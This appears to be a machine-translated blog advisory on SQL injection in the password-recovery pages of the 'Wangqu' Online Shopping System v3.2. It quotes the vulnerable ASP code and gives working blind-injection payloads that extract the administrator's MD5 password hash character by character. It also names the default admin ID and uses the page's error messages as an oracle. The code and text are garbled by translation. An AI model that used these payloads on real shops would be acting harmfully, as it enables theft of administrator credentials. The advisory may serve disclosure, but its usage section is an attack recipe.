Online Shopping System of Wangqu fashion edition v3.2 Injection Vulnerability

Cool Kid s blog

Involved versions: Online Shopping System fashion edition v3.2
Vulnerability files: getpwd2.asp, getpwd3.asp, getpwd4.asp
Vulnerability Description: The variable username is included in the SQL query without being filtered. The SQL injection vulnerability exists.
Key code:

 

ASP code
<%
Username = request. form ("username ")
Set rs = Server. CreateObject ("Adodb. Recordset ")
SQL = "select * from [user] where username =" & username ""
Rs. open SQL, conn, 1, 1
If rs. eof Then
%>
<Script language = "javascript">
Alert ("This user is not registered. Please register! ")
; Javascrip: close (); </script>
<%
End If
%>
<Html> <Meta http-equiv = "Content-Language" content = "zh-cn">
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">
<Link href = "images/css.css" rel = "stylesheet" type = "text/css">
<Script language = "javascript">
<! --
Function form1_onsubmit (){
If (document. form1.answer. value = "")
{
Alert ("Enter your answer. ")
Document. form1.answer. focus ()
Return false
}
}
// --> </Script>
Usage:
Postsubmit data (I can use the sword SQL .htm [http://www.loveshell.net/blog/blogview.asp? LogID = 70]). The default administrator ID is 4 and the password is 16-bit md5 (lowercase letter). The asc value in the range of 0-9 is 48-57, the asc value of lowercase letters is 97-122.

 

SQL code
Or (select count (*) from admin where adminid = 4 and asc (mid (password, N, 1) between 48 and 57) <> 0 and =

Or (select count (*) from admin where adminid = 4 and asc (mid (password, N, 1) between 97 and 122) <> 0 and =
Return correct "retrieve password", error return dialog box "This user is not registered, please register! "